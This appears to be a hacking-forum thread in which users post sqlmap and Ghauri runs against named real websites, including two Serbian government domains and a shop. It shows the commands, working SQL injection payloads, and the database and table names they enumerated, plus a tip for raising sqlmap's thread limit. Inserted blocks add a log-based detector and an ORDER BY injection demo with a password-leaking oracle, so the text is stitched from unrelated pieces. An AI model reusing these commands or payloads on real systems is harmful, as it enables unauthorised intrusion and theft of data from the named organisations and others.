How's the quest going?)) Did you get RCE or root?) What stage are you at?)
Known Microsoft honeypot. It's been all over Twitter, used for threat intelligence.
sqlmap --url="https://privatizacija.privreda.gov.rs/*" --dbs --threads=10 --time-sec=10 --dbms=mysql
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[00:02:52] [INFO] testing connection to the target URL
got a 301 redirect to 'https://privatizacija.privreda.gov.rs:443/Naslovna'. Do you want to follow? [Y/n] n
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=v0cqvvd08uu...tq6uen1dj5'). Do you want to use those [Y/n] Y
[00:02:54] [INFO] testing if the target URL content is stable
[00:02:54] [WARNING] URI parameter '#1*' does not appear to be dynamic
[00:02:55] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[00:02:55] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[00:02:55] [INFO] testing for SQL injection on URI parameter '#1*'
[00:02:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:03:07] [WARNING] reflective value(s) found and filtering out
[00:03:13] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:03:16] [INFO] testing 'Generic inline queries'
[00:03:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:03:21] [INFO] URI parameter '#1*' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] s
[00:04:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:04:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:04:41] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: https://privatizacija.privreda.gov.rs:443/' AND EXTRACTVALUE(5713,CONCAT(0x5c,0x716a626b71,(SELECT (ELT(5713=5713,1))),0x717a6a6a71)) AND 'QVlF'='QVlF
---
[00:04:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.4.16, PHP
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[00:04:50] [INFO] fetching database names
[00:04:50] [INFO] starting 2 threads
[00:04:51] [INFO] retrieved: 'information_schema'
[00:04:51] [INFO] retrieved: 'agencija'
available databases [2]:
[*] agencija
[*] information_schema
sqlmap -url="https://rfzo.gov.rs/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms=mysql --random-agent --dbs -p list[fullordering] --threads=10 --time-sec=5
[23:11:02] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de-AT; rv:1.9.1.8) Gecko/20100625 Firefox/3.6.6' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:11:02] [INFO] testing connection to the target URL
[23:11:02] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('fd1e006bbbf545b5e9af846e8842ed46=kgl6tkocqqn...40r5rftkd5'). Do you want to use those [Y/n] y
[23:11:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:11:05] [INFO] testing if the target URL content is stable
[23:11:05] [INFO] target URL content is stable
[23:11:08] [INFO] heuristic (basic) test shows that GET parameter 'list[fullordering]' might be injectable (possible DBMS: 'MySQL')
[23:11:08] [INFO] testing for SQL injection on GET parameter 'list[fullordering]'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[23:23:21] [INFO] GET parameter 'list[fullordering]' is 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' injectable
[23:23:48] [INFO] GET parameter 'list[fullordering]' appears to be 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' injectable
[23:23:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:23:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:23:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:24:07] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[23:24:17] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[23:24:26] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[23:24:34] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[23:24:43] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[23:24:52] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[23:25:01] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[23:25:10] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[23:25:18] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'list[fullordering]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 1907 HTTP(s) requests:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9297 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(9297=9297,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9266 FROM (SELECT(SLEEP(5)))wFLW)
---
[23:25:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: PHP 5.4.16, Apache 2.4.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:25:30] [INFO] fetching database names
[23:25:30] [INFO] starting 7 threads
[23:25:31] [INFO] retrieved: 'information_schema'
[23:25:31] [INFO] retrieved: 'novidzo1'
[23:25:31] [INFO] retrieved: 'novidzo5'
[23:25:31] [INFO] retrieved: 'novidzo7'
[23:25:31] [INFO] retrieved: 'novidzo'
[23:25:31] [INFO] retrieved: 'novidzo2'
[23:25:31] [INFO] retrieved: 'novidzo3'
available databases [7]:
[*] information_schema
[*] novidzo
[*] novidzo1
[*] novidzo2
[*] novidzo3
[*] novidzo5
[*] novidzo7
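The payloads sqlmap prints in the two runs above (EXTRACTVALUE error-based, FLOOR(RAND()) duplicate-key error-based, SLEEP time-based) are what the other side of this sees in its web-server logs. The following is an added example, not code from the thread or from sqlmap: a small detector that walks Apache combined-format access-log lines, URL-decodes the request target and flags the three techniques plus sqlmap's default result delimiters (by default a hex literal of the form 'q' + three letters + 'q', such as 0x716a626b71 above). The log lines are constructed for the example and reuse the exact payload strings from the thread; the IP addresses, timestamps and status codes are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access-log lines (not taken from any real
# server). Lines 1, 2 and 4 carry the payload strings sqlmap printed in the
# thread (FLOOR/RAND error-based, SLEEP time-based, EXTRACTVALUE error-based),
# URL-encoded as a client would send them; line 3 is benign traffic. IPs are
# from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2023:23:23:21 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=(SELECT%209297%20FROM(SELECT%20COUNT(*),CONCAT(0x7170767871,(SELECT%20(ELT(9297=9297,1))),0x71787a6b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 500 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2023:23:23:48 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=(SELECT%209266%20FROM%20(SELECT(SLEEP(5)))wFLW) HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2023:23:24:01 +0100] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8765 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2023:23:25:10 +0100] "GET /%27%20AND%20EXTRACTVALUE(5713,CONCAT(0x5c,0x716a626b71,(SELECT%20(ELT(5713=5713,1))),0x717a6a6a71))%20AND%20%27QVlF%27=%27QVlF HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Apache combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Signatures for the three techniques seen in the thread, plus sqlmap's default
# result delimiters: 'q' + three letters + 'q', sent as a hex literal such as
# 0x716a626b71 so that the extracted value can be cut out of the error text.
SIGNATURES = {
    "error-based EXTRACTVALUE/UPDATEXML": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "error-based FLOOR(RAND()) duplicate key": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "time-based SLEEP/BENCHMARK": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "sqlmap hex delimiter": re.compile(r"0x71[0-9a-f]{6}71", re.I),
}


def decode_hex_delimiters(decoded_target):
    """Turn sqlmap's 0x71...71 delimiter literals back into their ASCII form."""
    return [bytes.fromhex(tok[2:]).decode("ascii")
            for tok in SIGNATURES["sqlmap hex delimiter"].findall(decoded_target)]


def scan_log(text):
    """Return one dict per request whose decoded target matches any signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, method, target, status = m.groups()
        decoded = unquote_plus(target)  # match the decoded form, not the raw bytes
        matched = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if matched:
            hits.append({
                "ip": ip, "time": when, "method": method, "status": int(status),
                "path": decoded.split("?", 1)[0],
                "signatures": matched,
                "delimiters": decode_hex_delimiters(decoded),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["time"], hit["status"], hit["signatures"], hit["delimiters"])
```

Matching is done on the decoded target on purpose: the raw log line carries %20 and %27, and a signature written against the raw form is trivially evaded with double encoding or a different encoder. The decoded delimiters (qpvxq, qxzkq, qjbkq, qzjjq) are also handy for pivoting: the same pair stays constant for a whole sqlmap session, so it groups every request of one run even across changing User-Agent values.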
And what to do to stay, not to post here like you. P.S. This is old news from 2017)
SQL Injection Vulnerability com_fields in Joomla 3.7
The vulnerability is caused by a new component, com_fields, which was introduced in Joomla in version 3.7. If you use this version, you are affected. (malware.expert)
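The parameter sqlmap hit above, list[fullordering], is a list-ordering value, and that is the root of this bug class: the column in ORDER BY cannot be passed as a bound parameter, so applications concatenate it, and without an allowlist the attacker owns the ORDER BY expression. The following is an added example and not Joomla's code: a Python/sqlite3 illustration of the vulnerable pattern next to its hardened form, plus a boolean oracle that infers data purely from the order rows come back in (no error text, no SLEEP). The schema, the sample rows, the stored password value, the allowlist and every function name are assumptions made for the example.

```python
import sqlite3

# Constructed illustration of the bug class behind the Joomla 3.7 com_fields
# report above: a list ordering parameter spliced into ORDER BY. Not Joomla's
# code; the schema, rows, stored password and function names are assumptions.

ALLOWED_ORDERING_COLUMNS = {"a.id", "a.title", "a.state"}   # assumed allowlist
ALPHABET = "$./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def open_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE fields (id INTEGER, title TEXT, state INTEGER);
        INSERT INTO fields VALUES (1, 'alpha', 1), (2, 'beta', 0), (3, 'gamma', 1);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$hashedsecret');  -- constructed value
    """)
    return conn


def list_fields_vulnerable(conn, fullordering):
    """The pattern that went wrong: the ordering string goes straight into SQL.
    ORDER BY cannot take a bound parameter for the column, which is why
    developers reach for concatenation here."""
    sql = f"SELECT a.id FROM fields a ORDER BY {fullordering}"
    return [row[0] for row in conn.execute(sql)]


def list_fields_hardened(conn, fullordering):
    """Same query, but the column must come from an allowlist and the direction
    must be exactly ASC or DESC; anything else is rejected before SQL is built."""
    column, _, direction = fullordering.strip().partition(" ")
    direction = direction.strip().upper() or "ASC"
    if column not in ALLOWED_ORDERING_COLUMNS:
        raise ValueError(f"ordering column not allowed: {column!r}")
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"ordering direction not allowed: {direction!r}")
    sql = f"SELECT a.id FROM fields a ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def hardened_rejects(conn, fullordering):
    """True if the hardened listing refuses the given ordering value."""
    try:
        list_fields_hardened(conn, fullordering)
    except ValueError:
        return True
    return False


def order_oracle(conn, condition_sql):
    """Boolean oracle built purely from row order: the CASE flips the sort
    direction depending on the attacker-chosen condition, so neither an error
    message nor a delay is needed."""
    payload = f"(CASE WHEN ({condition_sql}) THEN a.id ELSE -a.id END)"
    return list_fields_vulnerable(conn, payload) == [1, 2, 3]


def leak_password_prefix(conn, length):
    """Recover the first `length` characters of the admin password hash one
    character at a time through the ordering oracle."""
    leaked = ""
    for pos in range(1, length + 1):
        for ch in ALPHABET:
            cond = (f"(SELECT substr(password, {pos}, 1) FROM users "
                    f"WHERE username = 'admin') = '{ch}'")
            if order_oracle(conn, cond):
                leaked += ch
                break
        else:
            return leaked  # no candidate matched: alphabet exhausted
    return leaked


if __name__ == "__main__":
    db = open_demo_db()
    print("vulnerable, honest ordering:", list_fields_vulnerable(db, "a.title DESC"))
    print("leaked via ORDER BY oracle:", leak_password_prefix(db, 7))
    print("hardened, honest ordering:", list_fields_hardened(db, "a.title DESC"))
    print("hardened rejects payload:",
          hardened_rejects(db, "(CASE WHEN 1=1 THEN a.id ELSE -a.id END)"))
```

The hardened version deliberately does not try to escape or quote the input: for an ORDER BY column there is nothing to quote, so the only safe move is to map the user value onto a fixed set of column names and a fixed set of directions, which is also what a WAF rule like the one sqlmap tripped above ("parameter length constraining mechanism detected") cannot substitute for.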
python3 sqlmap.py --url="https://jela.rs/user/?func=User_Login" --data="username=admin&password=admin" --dbs --random-agent --threads=25 --time-sec=5 --batch --level=5 --risk=3
[10:44:11] [INFO] POST parameter 'username' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --code=200)
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=admin' OR NOT 6970=6970 OR 'uuph'='TPkx&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 1789 FROM (SELECT(SLEEP(5)))Ywui) OR 'mstI'='jZWE&password=admin
---
[10:51:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
Ghauri identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
current_user(): 'jela_user@localhost'
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: username=admin'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&password=admin
---
available databases [2]:
[*] information_schema
[*] jela_db
Database: jela_db
[33 tables]
+--------------------------------+
| cms2_catalog_dodaci_value |
| cms2_administrators |
| cms2_catalog_manufacturer |
| cms2_catalog_order |
| cms2_catalog_1 |
| cms2__country |
| cms2__currency |
| cms2_ambijenti_koordinate |
| cms2_banner_picture |
| cms2__zone_international |
| cms2_catalog_order_items |
| cms2_catalog_funcionality |
| cms2_catalog_copy |
| cms2_catalog |
| cms2_catalog_invoice |
| cms2_catalog_list |
| cms2_catalog_discount_quantity |
| cms2_catalog_colors |
| cms2_alias |
| cms2_abmijenti |
| cms2_article |
| cms2__continent |
| cms2_catalog_colors_value |
| cms2__vat |
| cms2_banner |
| cms2_catalog_orders |
| cms2_catalog_discount_value |
| cms2_article_category |
| cms2_catalog_parameter |
| cms2__collector_types |
| cms2_catalog_category |
| cms2__zone_domestic |
| cms2_catalog_order_item |
How did you manage to run sqlmap with 25 threads?
In lib/core/settings.py, change the value of MAX_NUMBER_OF_THREADS.
Where were you before????